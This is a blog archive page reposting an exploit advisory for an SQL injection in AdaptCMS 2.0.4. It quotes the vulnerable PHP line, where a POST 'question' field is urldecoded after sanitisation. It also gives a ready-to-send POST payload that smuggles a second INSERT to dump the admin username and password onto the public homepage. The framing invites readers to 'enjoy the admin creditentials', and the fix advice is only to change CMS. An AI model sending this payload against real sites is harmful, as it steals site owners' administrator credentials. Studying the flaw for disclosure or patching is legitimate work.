Tag Archive for AdaptCMS 2.0.4 sql injection

AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection Vulnerability

AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection SQL injection açığı bulunmuş oluş açık hakkındaki açıklamalar şu şekilde;

# Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability
# Date: 26/10/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://www.adaptcms.com/
# Software Link: http://www.insanevisions.com/page/3/Downloads/
# Version: 2.0.4
# Tested on: Debian


As you know, I love fun and tricky SQL injections.
AdaptCMS is vulnerable to a really unusual one.

The vuln

First let's see the code :


Line 34 :
array_map('clean', $_POST);


clean() acts like addslashes.

But a couple of lines after:

ligne 111:

    mysql_query("INSERT INTO ".$pre."polls VALUES (null,
'".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '',
'".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')");

w00t an SQL injection. $_POST['question'] is urldecoded after the
superglobal's clean. That's why we can easily inject our SQL request.
(Without ENT_QUOTES, the simple quote pass through htmlentities() ).

The PoC :

Ok, now we have to add a second INSERT query, to insert a custom choice in
the poll, which obviously contain the admin creditentials.
A simple POST http request such as:
article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660),
(null, 0, (select concat(username, 0x3a, password) from adapt_users),
'option', '', 1, 1337, 1349597648  )-- -

Now check homepage, and enjoy the admin creditentials.

How to Fix ?

There is many SQL injections in this CMS ($_SERVER vars are vulnerables as
well), and others funkies vulnz.
changing your cms seems appropriate until they fix thoses issues.

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0,
Please visit : http://www.orgasm.re/